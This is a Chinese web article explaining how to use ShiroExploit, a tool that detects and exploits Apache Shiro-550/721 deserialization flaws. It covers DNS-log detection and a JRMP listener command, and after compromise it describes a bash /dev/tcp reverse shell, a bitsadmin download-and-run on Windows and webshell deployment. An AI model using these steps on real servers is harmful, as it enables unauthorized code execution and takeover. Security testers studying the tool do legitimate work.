溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

Shiro漏洞檢測(cè)工具ShiroExploit怎么使用

發(fā)布時(shí)間:2021-12-23 17:15:42 來源:億速云 閱讀:1174 作者:iii 欄目:大數(shù)據(jù)

本篇內(nèi)容主要講解“Shiro漏洞檢測(cè)工具ShiroExploit怎么使用”,感興趣的朋友不妨來看看。本文介紹的方法操作簡(jiǎn)單快捷,實(shí)用性強(qiáng)。下面就讓小編來帶大家學(xué)習(xí)“Shiro漏洞檢測(cè)工具ShiroExploit怎么使用”吧!

ShiroExploit

支持對(duì)Shiro550(硬編碼秘鑰)和Shiro721(Padding Oracle)的一鍵化檢測(cè),支持簡(jiǎn)單回顯。


使用說明

第一步:按要求輸入要檢測(cè)的目標(biāo)URL和選擇漏洞類型

  • Shiro550 無(wú)需提供rememberMe Cookie, Shiro721 需要提供一個(gè)有效的rememberMe Cookie
  • Shiro550 無(wú)需選擇操作系統(tǒng)類型, Shiro721 需要選擇操作系統(tǒng)類型
  • 可以手工指定特定的 Key 和 Gadget,默認(rèn)不指定,會(huì)遍歷所有的 Key 和 Gadget
  • 復(fù)雜Http請(qǐng)求支持直接粘貼數(shù)據(jù)包

Shiro漏洞檢測(cè)工具ShiroExploit怎么使用

第二步: 選擇攻擊方式


Shiro漏洞檢測(cè)工具ShiroExploit怎么使用

選擇使用 ceye.io 進(jìn)行漏洞檢測(cè)
  • 可以不進(jìn)行任何配置,配置文件中已經(jīng)預(yù)置了 CEYE 域名和對(duì)應(yīng)的 Token,當(dāng)然也可以對(duì)其進(jìn)行修改。
  • 程序會(huì)首先使用  URLDNS  篩選出唯一 Key,然后依次調(diào)用各個(gè) Gadget 生成 Payload
  • 缺點(diǎn):程序會(huì)使用 API: http://api.ceye.io/v1/records?token=a78a1cb49d91fe09e01876078d1868b2&type=dns&filter=[UUID]  查詢檢測(cè)結(jié)果,這個(gè) API 有時(shí)候會(huì)無(wú)法正常訪問,導(dǎo)致在這種方式下無(wú)法找到 Key 或者有效的 Gadget
選擇 使用 dnslog.cn 進(jìn)行漏洞檢測(cè)
  • 可以不進(jìn)行任何配置,每次啟動(dòng)時(shí)程序會(huì)自動(dòng)從  dnslog.cn  申請(qǐng)一個(gè) DNS Record。
  • 程序會(huì)首先使用  URLDNS  篩選出唯一 Key,然后依次調(diào)用各個(gè) Gadget 生成 Payload
  • 缺點(diǎn):少數(shù)時(shí)候 dnslog.cn 會(huì)間隔較久才顯示 DNS 解析結(jié)果導(dǎo)致程序無(wú)法找到 Key 或者有效的 Gadget,且 dnslog.cn 只會(huì)記錄最近的10條 DNS 解析記錄
選擇 使用 JRMP + dnslog 進(jìn)行漏洞檢測(cè)
  • 需要在 VPS 上通過命令 java -cp ShiroExploit.jar com.shiroexploit.server.BasicHTTPServer [HttpSerivce Port] [JRMPListener Port] 開啟HttpService/JRMPListener,并按照要求填入相應(yīng) IP 和端口
  • 如果開啟 HttpService/JRMPListener 時(shí)未指定端口號(hào),則  HTTPService  默認(rèn)監(jiān)聽  8080  端口, JRMPListener  默認(rèn)監(jiān)聽  8088  端口
  • 使用  JRMP  的方式進(jìn)行漏洞檢測(cè),可以顯著減小 cookie 大小
  • 程序會(huì)首先使用  URLDNS  篩選出唯一 Key,然后使用  JRMP  依次為各個(gè) Gadget 生成對(duì)應(yīng)的 JRMPListener
選擇 使用回顯進(jìn)行漏洞檢測(cè)
  • 針對(duì)不出網(wǎng)的情況進(jìn)行漏洞檢測(cè),此時(shí)可以檢測(cè)的 Gadget 類型會(huì)少于使用 DNSLog 方式的 Gadget類型
  • 目前主要是通過將命令執(zhí)行結(jié)果寫入 Web 目錄下然后讀取的方式實(shí)現(xiàn)回顯
  • 需要提供一個(gè)靜態(tài)資源 URL,程序會(huì)將此靜態(tài)資源所在的目錄當(dāng)做寫入目錄
  • 注:開始的時(shí)候使用  https://blog.csdn.net/fnmsd/article/details/106709736  介紹的方式實(shí)現(xiàn)回顯,在本地可以測(cè)試成功,但是在實(shí)際環(huán)境中基本不成功(可能是我的姿勢(shì)有問題,歡迎探討),所以目前是通過讀寫文件的方式實(shí)現(xiàn)回顯,后期可能會(huì)加入其它方式

第三步:檢測(cè)漏洞并執(zhí)行命令

  • 程序在判斷目標(biāo)應(yīng)用是否存在漏洞時(shí),窗口上部的輸入框無(wú)法進(jìn)行輸入。當(dāng)程序檢測(cè)出目標(biāo)應(yīng)用存在漏洞時(shí),輸入框可以進(jìn)行輸入并執(zhí)行命令。
  • 反彈shell(linux)  采用  bash -i >& /dev/tcp/1.2.3.4/443 0>&1  的方式反彈 shell
  • 反彈shell(Windows)  采用  bitsadmin  下載指定 URL 的 exe 文件并執(zhí)行的方式獲取 shell

Shiro漏洞檢測(cè)工具ShiroExploit怎么使用

  • 獲取Webshell  可以在能夠回顯的情況下直接在使用者給出的路徑(目錄需要真實(shí)存在)下寫入 webshell, webshell 名稱和后綴名由使用者自行指定,webshell 的內(nèi)容從 config 目錄下的 shell.jsp 中讀取

Shiro漏洞檢測(cè)工具ShiroExploit怎么使用

備注

在使用漏洞檢測(cè)主程序或者開啟 HttpService/JRMPListener 時(shí),均需要ysoserial.jar的支持,將ysoserial.jar和ShiroExploit.jar放置在同一目錄即可。

到此,相信大家對(duì)“Shiro漏洞檢測(cè)工具ShiroExploit怎么使用”有了更深的了解,不妨來實(shí)際操作一番吧!這里是億速云網(wǎng)站,更多相關(guān)內(nèi)容可以進(jìn)入相關(guān)頻道進(jìn)行查詢,關(guān)注我們,繼續(xù)學(xué)習(xí)!

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI